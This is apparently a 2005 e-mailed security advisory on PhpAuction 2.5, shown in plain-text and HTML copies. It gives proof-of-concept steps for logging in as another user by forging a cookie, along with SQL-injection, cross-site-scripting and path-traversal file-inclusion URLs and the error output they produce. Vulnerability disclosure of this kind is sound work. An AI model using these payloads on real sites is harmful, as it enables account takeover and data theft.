PhpAuction suffers from authentication bypass, SQL injection, cross site scripting, and file inclusion vulnerabilities. Detailed exploitation provided.
f2316d88cd2264a9859477b05fd94ba5e10a624685a7274f87766211ffeff407
This is a multi-part message in MIME format.
------=_NextPart_000_0009_01C58325.6436F8C0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
-------------------------------------------------------------------------=
-------
Dcrab 's Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies
******************************
SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU =
CAN SEND EMAILS TO DCRAB@HACKERSCENTER.COM
******************************
Get Dcrab's Services to audit your Web servers, scripts, networks, etc =
or even code them. Learn more at http://www.dbtech.org
Severity: High
Title: [Bday Release] PhpAuction has Authentication Bypass, Multiple Sql =
injection, Cross Site Scripting and File Include vulnerabilities
Date: 8/07/2005
Vendor: PhpAuction
Vendor Website: http://www.phpauction.org
Vendor Status: Contacted but no reply
Summary: There are, Authentication Bypass, Multiple Sql injection, Cross =
Site Scripting and File Include vulnerabilities in PhpAuction.
Proof of Concept Exploits:=20
Authentication bypass
Set the cookie as follows,
Name: PHPAUCTION_RM_ID
VALUE: Id number of the user/admin you want to impersinate (you can get =
it from thier profile)
Access the website, and you'r instantly logged in as them ;)
/phpauction-gpl-2.5/adsearch.php?title=3D1&desc=3Don&closed=3Don&category=
=3D'SQL_INJECTION&minprice=3D1&maxprice=3D1&payment%5B%5D=3Don&payment%5B=
%5D=3Don&payment%5B%5D=3Don&payment%5B%5D=3Don&seller=3D1&country=3DAfgha=
nistan&ending=3D1&SortProperty=3Dends&type=3D2&action=3Dsearch&go=3DGO%20=
%3E%3E
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL =
result resource in =
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/ad=
search.php on line 33
/viewnews.php?id=3D'SQL_INJECTION
Error: select * from PROSITE_news where id=3D\'SQL_INJECTION
You have an error in your SQL syntax. Check the manual that corresponds =
to your MySQL server version for the right syntax to use near =
'\'SQL_INJECTION' at line 1
/phpauction-gpl-2.5/index.php?lan=3D<script>alert(document.cookie)</scrip=
t>
Cross Site Scripting
/phpauction-gpl-2.5/profile.php?user_id=3D158&auction_id=3D<script>alert(=
document.cookie)</script>
Cross Site Scripting
/phpauction-gpl-2.5/profile.php?auction_id=3D<script>alert(document.cooki=
e)</script>&id=3D159
Cross Site Scripting
/phpauction-gpl-2.5/admin/index.php?lan=3D<script>alert(document.cookie)<=
/script>
Cross Site Scripting
/login.php?username=3D<script>alert(document.cookie)</script>
Cross Site Scripting
/viewnews.php?id=3D<script>alert(document.cookie)</script>
Cross Site Scripting
/phpauction-gpl-2.5/index.php?lan=3D../put/.inc.php/file/name/here
Warning: =
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/me=
ssages.../put/.inc.php/file/name/here.inc.php): failed to open stream: =
No such file or directory in =
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=
cludes/messages.inc.php on line 34
Fatal error: main(): Failed opening required =
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messag=
es.../put/.inc.php/file/name/here.inc.php' =
(include_path=3D'.:/usr/local/lib/php') in =
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=
cludes/messages.inc.php on line 34
/phpauction-gpl-2.5/admin/index.php?lan=3D../put/.inc.php/file/name/here
Warning: =
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/me=
ssages.../put/.inc.php/file/name/here.inc.php): failed to open stream: =
No such file or directory in =
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=
cludes/messages.inc.php on line 34
Fatal error: main(): Failed opening required =
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messag=
es.../put/.inc.php/file/name/here.inc.php' =
(include_path=3D'.:/usr/local/lib/php') in =
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=
cludes/messages.inc.php on line 34
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah =
and at http://www.hackerscenter.com
Author:=20
These vulnerabilities have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my =
soon to come out book on Secure coding with php.
Sincerely,=20
Diabolic Crab=20
------=_NextPart_000_0009_01C58325.6436F8C0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2668" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV>
<HR>
</DIV>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20
href=3D"http://www.dbtech.org">http://www.dbtech.org</A><BR>Deadbolt =
Computer=20
Technologies</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial =
size=3D2>******************************<BR>SPECIAL BIRTHDAY=20
RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU CAN SEND EMAILS TO =
<A=20
href=3D"mailto:DCRAB@HACKERSCENTER.COM">DCRAB@HACKERSCENTER.COM</A><BR>**=
****************************</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =
servers,=20
scripts, networks, etc or even code them. Learn more at <A=20
href=3D"http://www.dbtech.org">http://www.dbtech.org</A></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: [Bday Release] =
PhpAuction=20
has Authentication Bypass, Multiple Sql injection, Cross Site Scripting =
and File=20
Include vulnerabilities<BR>Date: 8/07/2005</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: PhpAuction<BR>Vendor Website: =
<A=20
href=3D"http://www.phpauction.org">http://www.phpauction.org</A><BR>Vendo=
r Status:=20
Contacted but no reply<BR>Summary: There are, Authentication Bypass, =
Multiple=20
Sql injection, Cross Site Scripting and File Include vulnerabilities in=20
PhpAuction.</FONT></DIV>
<DIV> </DIV><FONT face=3DArial size=3D2>
<DIV><BR>Proof of Concept Exploits: </DIV>
<DIV> </DIV>
<DIV>Authentication bypass<BR>Set the cookie as follows,<BR>Name:=20
PHPAUCTION_RM_ID<BR>VALUE: Id number of the user/admin you want to =
impersinate=20
(you can get it from thier profile)<BR>Access the website, and you'r =
instantly=20
logged in as them ;)</DIV>
<DIV> </DIV>
<DIV>/phpauction-gpl-2.5/adsearch.php?title=3D1&desc=3Don&closed=3D=
on&category=3D'SQL_INJECTION&minprice=3D1&maxprice=3D1&pa=
yment%5B%5D=3Don&payment%5B%5D=3Don&payment%5B%5D=3Don&paymen=
t%5B%5D=3Don&seller=3D1&country=3DAfghanistan&ending=3D1&=
SortProperty=3Dends&type=3D2&action=3Dsearch&go=3DGO%20%3E%3E=
</DIV>
<DIV> </DIV>
<DIV>Warning: mysql_fetch_assoc(): supplied argument is not a valid =
MySQL result=20
resource in=20
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/ad=
search.php=20
on line 33</DIV>
<DIV> </DIV>
<DIV>/viewnews.php?id=3D'SQL_INJECTION<BR>Error: select * from =
PROSITE_news where=20
id=3D\'SQL_INJECTION<BR>You have an error in your SQL syntax. Check the =
manual=20
that corresponds to your MySQL server version for the right syntax to =
use near=20
'\'SQL_INJECTION' at line 1</DIV>
<DIV> </DIV>
<DIV>/phpauction-gpl-2.5/index.php?lan=3D<script>alert(document.coo=
kie)</script><BR>Cross=20
Site Scripting</DIV>
<DIV> </DIV>
<DIV>/phpauction-gpl-2.5/profile.php?user_id=3D158&auction_id=3D<s=
cript>alert(document.cookie)</script><BR>Cross=20
Site Scripting</DIV>
<DIV> </DIV>
<DIV>/phpauction-gpl-2.5/profile.php?auction_id=3D<script>alert(doc=
ument.cookie)</script>&id=3D159<BR>Cross=20
Site Scripting</DIV>
<DIV> </DIV>
<DIV>/phpauction-gpl-2.5/admin/index.php?lan=3D<script>alert(docume=
nt.cookie)</script><BR>Cross=20
Site Scripting</DIV>
<DIV> </DIV>
<DIV>/login.php?username=3D<script>alert(document.cookie)</scrip=
t><BR>Cross=20
Site Scripting</DIV>
<DIV> </DIV>
<DIV>/viewnews.php?id=3D<script>alert(document.cookie)</script&g=
t;<BR>Cross=20
Site Scripting</DIV>
<DIV> </DIV>
<DIV>/phpauction-gpl-2.5/index.php?lan=3D../put/.inc.php/file/name/here</=
DIV>
<DIV> </DIV>
<DIV>Warning:=20
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/me=
ssages.../put/.inc.php/file/name/here.inc.php):=20
failed to open stream: No such file or directory in=20
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=
cludes/messages.inc.php=20
on line 34</DIV>
<DIV> </DIV>
<DIV>Fatal error: main(): Failed opening required=20
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messag=
es.../put/.inc.php/file/name/here.inc.php'=20
(include_path=3D'.:/usr/local/lib/php') in=20
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=
cludes/messages.inc.php=20
on line 34</DIV>
<DIV> </DIV>
<DIV><BR>/phpauction-gpl-2.5/admin/index.php?lan=3D../put/.inc.php/file/n=
ame/here</DIV>
<DIV> </DIV>
<DIV>Warning:=20
main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/me=
ssages.../put/.inc.php/file/name/here.inc.php):=20
failed to open stream: No such file or directory in=20
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=
cludes/messages.inc.php=20
on line 34</DIV>
<DIV> </DIV>
<DIV>Fatal error: main(): Failed opening required=20
'/home/**********/********/public_html/phpauction-gpl-2.5/includes/messag=
es.../put/.inc.php/file/name/here.inc.php'=20
(include_path=3D'.:/usr/local/lib/php') in=20
/home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in=
cludes/messages.inc.php=20
on line 34</DIV>
<DIV> </DIV>
<DIV><BR>Keep your self updated, Rss feed at: <A=20
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=
h</A> and=20
at <A =
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A></D=
IV>
<DIV> </DIV>
<DIV>Author: <BR>These vulnerabilities have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://www.dbtech.org/">http://www.dbtech.org/</A>. Lookout for =
my soon to=20
come out book on Secure coding with php.</DIV>
<DIV> </DIV>
<DIV></FONT> </DIV>
<DIV><BR>Sincerely, <BR>Diabolic Crab <BR><BR><BR></DIV></BODY></HTML>
------=_NextPart_000_0009_01C58325.6436F8C0--